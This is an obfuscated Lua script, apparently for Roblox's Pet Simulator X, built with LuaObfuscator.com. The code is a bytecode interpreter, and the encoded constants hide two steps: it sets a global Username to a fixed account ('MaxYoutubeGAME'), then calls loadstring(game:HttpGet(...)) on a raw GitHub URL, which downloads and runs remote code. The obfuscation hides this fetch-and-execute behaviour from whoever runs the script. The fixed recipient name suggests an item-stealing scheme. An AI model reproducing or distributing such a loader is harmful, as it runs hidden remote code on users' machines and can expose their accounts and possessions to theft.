--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=v5(v85,v19);v19=nil;return v102;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((5 -3)^(v32-(2 -(1638 -(1523 + 114))))))%((3 -1)^(((v33-1) -(v32-((2 + 0) -1))) + (620 -(555 + (91 -27))))) ;return v86-(v86%(932 -(857 + 74))) ;else local v87=(570 -(367 + 201))^(v32-((1805 -(282 + 595)) -(214 + (1778 -(68 + 997))))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or ((1270 -(226 + 1044)) + 0) ;end end local function v21()local v34=0 + (0 -0) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=351 -(87 + 263) ;end end end local function v22()local v36=180 -(67 + 113) ;local v37;local v38;while true do if (v36==(1 + (0 -0))) then return (v38 * ((1139 -511) -372)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (7 -5) ;v36=953 -(802 + 110 + 40) ;end end end local function v23()local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(998 -(915 + (145 -63)))) then return (v43 * (47505959 -30728743)) + (v42 * (38178 + 27358)) + (v41 * (336 -80)) + v40 ;end if (v39==((1178 + 9) -(1069 + 118))) then v40,v41,v42,v43=v1(v16,v18,v18 + (6 -3) );v18=v18 + (8 -4) ;v39=1 + 0 ;end end end local function v24()local v44=791 -((1069 -(376 + 325)) + 423) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (2==v44) then v49=v20(v46,65 -44 ,54 -23 );v50=((v20(v46,50 -(10 + 8) )==(3 -2)) and  -(3 -2)) or (443 -(416 + 26)) ;v44=9 -6 ;end if (v44==(9 -6)) then if (v49==(0 + 0)) then if (v48==(0 -0)) then return v50 * (438 -(145 + 293)) ;else v49=1914 -((2931 -1142) + 124) ;v47=766 -(745 + 21) ;end elseif (v49==(2477 -(44 + 386))) then return ((v48==(0 -0)) and (v50 * ((3 -2)/(1486 -(998 + (1501 -1013)))))) or (v50 * NaN) ;end return v8(v50,v49-(804 + 219) ) * (v47 + (v48/((1 + 1)^(43 + 9)))) ;end if (v44==(772 -(201 + 571))) then v45=v23();v46=v23();v44=(326 + 813) -(116 + (2250 -1228)) ;end if (v44==(4 -3)) then v47=1 + 0 ;v48=(v20(v46,3 -(16 -(9 + 5)) ,71 -51 ) * (((1237 -(85 + 291)) -(814 + 45))^(78 -46))) + v45 ;v44=1 + 1 ;end end end local function v25(v51)local v52=(586 + 679) -(243 + 1022) ;local v53;local v54;while true do if ((7 -5)==v52) then v54={};for v91=1 -(438 -(262 + 176)) , #v53 do v54[v91]=v2(v1(v3(v53,v91,v91)));end v52=3 + 0 ;end if ((1183 -(1123 + 57))==v52) then return v6(v54);end if (v52==(1 + 0)) then v53=v3(v16,v18,(v18 + v51) -1 );v18=v18 + v51 ;v52=(1977 -(345 + 1376)) -(163 + 91) ;end if (v52==0) then v53=nil;if  not v51 then local v97=0;while true do if (v97==(1474 -(1329 + 145))) then v51=v23();if (v51==(1930 -(1869 + 61))) then return "";end break;end end end v52=1 + (718 -(15 + 703)) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v55=580 -(361 + 219) ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v55==2) then v60=nil;v61=nil;v55=3;end if (v55==(320 -(53 + 267))) then v56=0;v57=nil;v55=1 + 0 ;end if (v55~=1) then else v58=nil;v59=nil;v55=2;end if (v55~=(417 -(15 + 398))) then else while true do if (2==v56) then local v98=0;local v99;while true do if (v98==(982 -(18 + 964))) then v99=0 -0 ;while true do if (v99==(1 + 0)) then v56=3;break;end if ((0 + 0)~=v99) then else v61=nil;v62=nil;v99=1;end end break;end end end if (v56~=(850 -(20 + 830))) then else local v100=0 + 0 ;while true do if (v100~=(126 -(116 + 10))) then else local v111=0 + 0 ;while true do if (v111~=(738 -(542 + 196))) then else v57=0 -0 ;v58=nil;v111=1 + 0 ;end if (v111~=1) then else v100=1;break;end end end if (v100==(1 + 0)) then v56=1;break;end end end if ((2 + 1)==v56) then v63=nil;while true do local v103=0;local v104;while true do if ((0 -0)~=v103) then else v104=0 -0 ;while true do if (v104~=(1552 -(1126 + 425))) then else if (v57~=2) then else local v171=0;local v172;while true do if (v171~=0) then else v172=0;while true do if (v172~=1) then else for v185=1,v23() do local v186=0;local v187;while true do if (v186==0) then v187=v21();if (v20(v187,1,1)~=0) then else local v189=405 -(118 + 287) ;local v190;local v191;local v192;local v193;local v194;local v195;while true do if (v189~=(0 -0)) then else v190=1121 -(118 + 1003) ;v191=nil;v189=1;end if (v189~=2) then else v194=nil;v195=nil;v189=8 -5 ;end if (v189==1) then v192=nil;v193=nil;v189=2;end if (v189==3) then while true do if (v190==1) then v193=nil;v194=nil;v190=379 -(142 + 235) ;end if ((0 -0)~=v190) then else local v203=0;while true do if (v203~=(0 + 0)) then else v191=977 -(553 + 424) ;v192=nil;v203=1;end if (1==v203) then v190=1 -0 ;break;end end end if (v190~=2) then else v195=nil;while true do if (v191~=1) then else local v207=0 + 0 ;while true do if (v207~=(0 + 0)) then else v194=nil;v195=nil;v207=1 + 0 ;end if (v207==(1 + 0)) then v191=2;break;end end end if (v191~=0) then else local v208=0;while true do if (v208==(0 + 0)) then v192=0;v193=nil;v208=2 -1 ;end if (v208~=(2 -1)) then else v191=2 -1 ;break;end end end if (v191~=(1 + 1)) then else while true do if (v192~=1) then else local v209=0;local v210;while true do if ((0 -0)==v209) then v210=753 -(239 + 514) ;while true do if (v210~=1) then else v192=2;break;end if (v210~=(0 + 0)) then else local v220=1329 -(797 + 532) ;while true do if (v220~=1) then else v210=1 + 0 ;break;end if (v220==0) then v195={v22(),v22(),nil,nil};if (v193==0) then local v223=0 + 0 ;local v224;local v225;while true do if (v223~=1) then else while true do if (0~=v224) then else v225=0 -0 ;while true do if (v225~=0) then else v195[1205 -(373 + 829) ]=v22();v195[4]=v22();break;end end break;end end break;end if (v223~=(731 -(476 + 255))) then else v224=1130 -(369 + 761) ;v225=nil;v223=1 + 0 ;end end elseif (v193==1) then v195[3]=v23();elseif (v193==2) then v195[5 -2 ]=v23() -(2^16) ;elseif (v193~=(5 -2)) then else local v229=238 -(64 + 174) ;local v230;local v231;while true do if (v229~=(0 + 0)) then else v230=0;v231=nil;v229=1;end if (v229==1) then while true do if (v230~=(0 -0)) then else v231=336 -(144 + 192) ;while true do if (v231~=(216 -(42 + 174))) then else v195[3 + 0 ]=v23() -(2^(14 + 2)) ;v195[4]=v22();break;end end break;end end break;end end end v220=1;end end end end break;end end end if (v192~=(0 + 0)) then else local v211=0;while true do if (v211==(1505 -(363 + 1141))) then v192=1581 -(1183 + 397) ;break;end if (v211~=0) then else local v218=0 -0 ;local v219;while true do if (v218~=(0 + 0)) then else v219=0 + 0 ;while true do if ((1975 -(1913 + 62))~=v219) then else v193=v20(v187,2,2 + 1 );v194=v20(v187,4,6);v219=2 -1 ;end if (v219~=1) then else v211=1;break;end end break;end end end end end if (v192==3) then if (v20(v194,1936 -(565 + 1368) ,11 -8 )~=1) then else v195[4]=v63[v195[4]];end v58[v185]=v195;break;end if (v192==(1663 -(1477 + 184))) then local v213=0 -0 ;local v214;while true do if (v213~=(0 + 0)) then else v214=0;while true do if (v214~=1) then else v192=3;break;end if (v214==0) then local v221=0;local v222;while true do if (0~=v221) then else v222=0;while true do if (v222==(856 -(564 + 292))) then local v226=0;while true do if (1==v226) then v222=1 -0 ;break;end if (v226~=0) then else if (v20(v194,1,2 -1 )==1) then v195[306 -(244 + 60) ]=v63[v195[2]];end if (v20(v194,2 + 0 ,478 -(41 + 435) )~=(1002 -(938 + 63))) then else v195[3 + 0 ]=v63[v195[3]];end v226=1;end end end if (v222==(1126 -(936 + 189))) then v214=1 + 0 ;break;end end break;end end end end break;end end end end break;end end break;end end break;end end end break;end end end v57=3;break;end if (v172~=0) then else local v183=0;local v184;while true do if (v183==(1613 -(1565 + 48))) then v184=0;while true do if (v184~=1) then else v172=1 + 0 ;break;end if (v184~=0) then else for v197=1,v62 do local v198=1138 -(782 + 356) ;local v199;local v200;local v201;while true do if (v198~=(268 -(176 + 91))) then else v201=nil;while true do if (v199==(2 -1)) then if (v200==1) then v201=v21()~=(0 -0) ;elseif (v200==2) then v201=v24();elseif (v200==(1095 -(975 + 117))) then v201=v25();end v63[v197]=v201;break;end if (v199~=(1875 -(157 + 1718))) then else local v205=0 + 0 ;local v206;while true do if (v205==(0 -0)) then v206=0;while true do if ((0 -0)~=v206) then else local v215=1018 -(697 + 321) ;while true do if (v215~=(0 -0)) then else v200=v21();v201=nil;v215=1 -0 ;end if (v215~=(2 -1)) then else v206=1;break;end end end if (v206==(1 + 0)) then v199=1;break;end end break;end end end end break;end if (v198==0) then local v202=0 -0 ;while true do if (v202==(0 -0)) then v199=1227 -(322 + 905) ;v200=nil;v202=612 -(602 + 9) ;end if (1~=v202) then else v198=1;break;end end end end end v61[1192 -(449 + 740) ]=v21();v184=1;end end break;end end end end break;end end end if (v57~=3) then else local v173=0;while true do if ((872 -(826 + 46))==v173) then for v181=948 -(245 + 702) ,v23() do v59[v181-1 ]=v28();end return v61;end end end break;end if (v104~=(0 -0)) then else local v156=0;while true do if (v156==1) then v104=1 + 0 ;break;end if (0~=v156) then else if (v57==1) then local v178=0;local v179;while true do if (v178==(1898 -(260 + 1638))) then v179=440 -(382 + 58) ;while true do if ((0 -0)==v179) then local v188=0 + 0 ;while true do if (v188~=1) then else v179=1 -0 ;break;end if (v188==0) then v61={v58,v59,nil,v60};v62=v23();v188=1;end end end if (v179==(2 -1)) then v63={};v57=2;break;end end break;end end end if ((0 + 0)~=v57) then else local v180=0;while true do if (v180==(1691 -(1121 + 569))) then v60={};v57=215 -(22 + 192) ;break;end if (v180~=(683 -(483 + 200))) then else v58={};v59={};v180=1;end end end v156=1;end end end end break;end end end break;end if (v56~=(1464 -(1404 + 59))) then else local v101=0 -0 ;while true do if (v101~=0) then else v59=nil;v60=nil;v101=1 -0 ;end if (v101~=1) then else v56=2;break;end end end end break;end if (v55==3) then v62=nil;v63=nil;v55=4;end end end local function v29(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end elseif (v83>1) then v80[v82[2]]();else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=3) then do return;end elseif (v83==4) then local v116=0;local v117;local v118;while true do if (v116==1) then v80[v117 + 1 ]=v118;v80[v117]=v118[v82[4]];break;end if (v116==0) then v117=v82[2];v118=v80[v82[3]];v116=1;end end else local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==1) then v75=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==2) then for v169=v120,v75 do local v170=0;while true do if (v170==0) then v123=v123 + 1 ;v80[v169]=v121[v123];break;end end end break;end if (v119==0) then v120=v82[2];v121,v122=v73(v80[v120](v13(v80,v120 + 1 ,v82[3])));v119=1;end end end elseif (v83<=8) then if (v83<=6) then local v105=0;local v106;local v107;local v108;local v109;local v110;while true do if (v105==1) then v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v105=2;end if (v105==5) then v74=v74 + 1 ;v82=v70[v74];v110=v82[2];v107,v108=v73(v80[v110](v13(v80,v110 + 1 ,v82[3])));v105=6;end if (v105==8) then v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v105=9;end if (v105==0) then v106=nil;v107,v108=nil;v109=nil;v110=nil;v105=1;end if (v105==6) then v75=(v108 + v110) -1 ;v106=0;for v153=v110,v75 do local v154=0;while true do if (v154==0) then v106=v106 + 1 ;v80[v153]=v107[v106];break;end end end v74=v74 + 1 ;v105=7;end if (v105==2) then v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v66;else v80[v82[2]]=v66[v82[3]];end v74=v74 + 1 ;v105=3;end if (v105==9) then v74=v82[3];break;end if (v105==7) then v82=v70[v74];v110=v82[2];v80[v110]=v80[v110](v13(v80,v110 + 1 ,v75));v74=v74 + 1 ;v105=8;end if (4==v105) then v80[v110]=v109[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v105=5;end if (v105==3) then v82=v70[v74];v110=v82[2];v109=v80[v82[3]];v80[v110 + 1 ]=v109;v105=4;end end elseif (v83>7) then v66[v82[3]]=v80[v82[2]];else v80[v82[2]]=v82[3];end elseif (v83<=10) then if (v83>9) then v74=v82[3];else for v151=v82[2],v82[3] do v80[v151]=nil;end end elseif (v83>11) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else local v129=v82[2];v80[v129]=v80[v129](v13(v80,v129 + 1 ,v75));end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F03063O006661726D7569030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403493O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473392E6C756103083O00557365726E616D65030D3O004D6178596F7475626547414D45030D3O006C6F6164696E677363722O656E00243O0012073O00014O0009000100013O00260C3O00020001000100040A3O00020001001207000100013O00260C000100110001000200040A3O001100012O0001000200013O001206000200033O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O0023000100260C000100050001000100040A3O00050001001207000200013O00260C0002001B0001000100040A3O001B0001001207000300093O001208000300084O0001000300013O0012080003000A3O001207000200023O00260C000200140001000200040A3O00140001001207000100023O00040A3O0005000100040A3O0014000100040A3O0005000100040A3O0023000100040A3O000200012O00033O00017O00",v9(),...);
